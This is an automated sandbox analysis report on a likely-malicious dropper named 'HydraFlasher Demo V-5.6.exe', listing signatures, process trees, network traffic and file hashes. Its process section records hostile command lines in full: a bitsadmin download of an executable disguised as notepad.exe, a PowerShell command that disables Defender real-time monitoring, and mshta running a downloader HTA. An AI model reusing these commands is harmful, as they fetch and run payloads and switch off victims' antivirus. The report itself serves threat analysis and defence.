Malware Analysis Report

2024-10-16 05:07

Sample ID 240728-xng9dayfll
Target HydraFlasher Demo V-5.6.exe
SHA256 536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0
Tags
discovery dropper execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0

Threat Level: Likely malicious

The file HydraFlasher Demo V-5.6.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery dropper execution

Download via BitsAdmin

.NET Reactor proctector

Checks computer location settings

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Modifies registry class

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-28 18:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 18:59

Reported

2024-07-28 19:02

Platform

win10v2004-20240709-en

Max time kernel

50s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
N/A N/A C:\Users\Admin\HydraFlasher Demo.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\HydraFlasher Demo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Users\Admin\HydraFlasher Demo.exe

"C:\Users\Admin\HydraFlasher Demo.exe"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/sleeper-cell/security/releases/download/dllhost/xvchosts.exe C:\Users\Admin\AppData\Roaming\notepad.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ExecutionPolicy Bypass -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.blockchain.com/btc/address/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd61646f8,0x7ffdd6164708,0x7ffdd6164718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.blockchain.com udp
US 104.17.11.85:443 www.blockchain.com tcp
US 104.17.11.85:443 www.blockchain.com tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 coinzillatag.com udp
US 104.21.69.73:443 coinzillatag.com tcp
US 8.8.8.8:53 85.11.17.104.in-addr.arpa udp
FR 172.217.18.200:443 ssl.google-analytics.com tcp
US 104.21.69.73:443 coinzillatag.com tcp
FR 172.217.18.200:443 ssl.google-analytics.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe

MD5 154e7c4941e5c99f6fe369ff90dc8370
SHA1 d155c4fcccc60ae26291fd1177780b3591ccbb49
SHA256 ff295bc05708762ae2fc54195c8785708291219e6d07ec52077980049e1f3d24
SHA512 c37427cae52c78d95829b690113a5dab7c4a859a7d2c8781bd1580c9af24b6a7eb53d0d3bdaf87aa505035f2620e36e5688ea5da90eb7c16203a7bea634c544d

memory/1952-13-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-12-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-11-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/4728-14-0x0000000000AE0000-0x000000000158A000-memory.dmp

memory/1952-22-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-24-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-23-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-21-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-20-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-19-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

memory/1952-18-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp

C:\Users\Admin\HydraFlasher Demo.exe

MD5 ac70d7032b72fb148ac74a0b902de461
SHA1 c3fe932e0e5f672b1dedd5309087f7e7d165c683
SHA256 a672ed87b2f51e8f549194b1e2bdfcd8b3d3326bc60f2eb8e76ab7f4422a5c63
SHA512 f840046e0192605aacd9e428bb46fffd53bc39c7f0ce04ccb5ba81df35cee36a6fffc7cbd6ad51e89eea3cbbc3687951a3baf8de662c4068cc026dba62a44b8a

C:\Users\Admin\Downloader.hta

MD5 2dc6046e1cd218ba1ae101c6a96cb1ea
SHA1 26f057f84ca50739d3be3bdb022906b296364744
SHA256 012954762478b91e47a668255ce82791a4078761b18aaa74fc4e4c7168214cc8
SHA512 49f202b82a9561022b5b1299bbb2fcbda7ac89de6b8cfe7d5ba68ba08002b0cdefa93642128c08b217741644245fa2f550581bb4107676a592d615cdcdaa9179

memory/4260-58-0x0000000000990000-0x0000000001430000-memory.dmp

memory/4260-59-0x0000000006610000-0x0000000006BB4000-memory.dmp

memory/4260-60-0x0000000005E60000-0x0000000005EF2000-memory.dmp

memory/4260-61-0x0000000005E50000-0x0000000005E5A000-memory.dmp

memory/1564-65-0x0000000002960000-0x0000000002996000-memory.dmp

memory/1564-66-0x00000000056F0000-0x0000000005D18000-memory.dmp

memory/1564-67-0x00000000052E0000-0x0000000005302000-memory.dmp

memory/1564-68-0x0000000005580000-0x00000000055E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apebtnye.ubp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1564-74-0x0000000005660000-0x00000000056C6000-memory.dmp

memory/1564-79-0x0000000005D20000-0x0000000006074000-memory.dmp

memory/1564-80-0x00000000056D0000-0x00000000056EE000-memory.dmp

memory/1564-81-0x00000000062F0000-0x000000000633C000-memory.dmp

memory/1564-82-0x0000000007460000-0x0000000007492000-memory.dmp

memory/1564-83-0x000000006C4C0000-0x000000006C50C000-memory.dmp

memory/1564-93-0x0000000006880000-0x000000000689E000-memory.dmp

memory/1564-94-0x00000000074A0000-0x0000000007543000-memory.dmp

memory/1564-95-0x0000000007C30000-0x00000000082AA000-memory.dmp

memory/1564-96-0x00000000075F0000-0x000000000760A000-memory.dmp

memory/1564-97-0x0000000007660000-0x000000000766A000-memory.dmp

memory/1564-98-0x0000000007870000-0x0000000007906000-memory.dmp

memory/1564-99-0x00000000077F0000-0x0000000007801000-memory.dmp

memory/1564-100-0x0000000007820000-0x000000000782E000-memory.dmp

memory/1564-101-0x0000000007830000-0x0000000007844000-memory.dmp

memory/1564-102-0x0000000007930000-0x000000000794A000-memory.dmp

memory/1564-103-0x0000000007910000-0x0000000007918000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 54aadd2d8ec66e446f1edb466b99ba8d
SHA1 a94f02b035dc918d8d9a46e6886413f15be5bff0
SHA256 1971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e
SHA512 7e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994

\??\pipe\LOCAL\crashpad_3532_XUJIWUYPWRVMKRJZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 2f842025e22e522658c640cfc7edc529
SHA1 4c2b24b02709acdd159f1b9bbeb396e52af27033
SHA256 1191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e
SHA512 6e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b056dc60bb476d9ac65ad76c9c778f45
SHA1 cd4943b47e697b7c773448580573d6292e7ef1eb
SHA256 9a06a7cd0edcaf9ad4669bdfc3bf4bac6399f80a22d2cf6884da8e166c02383d
SHA512 5d4e75dac237f3b1950cfccc48e18cfb4b13a1e553be0160373462a2321160ca2448fbce398a562839a84d86634783ed6e577adaee4d15e1a1b85d7b9d7e985c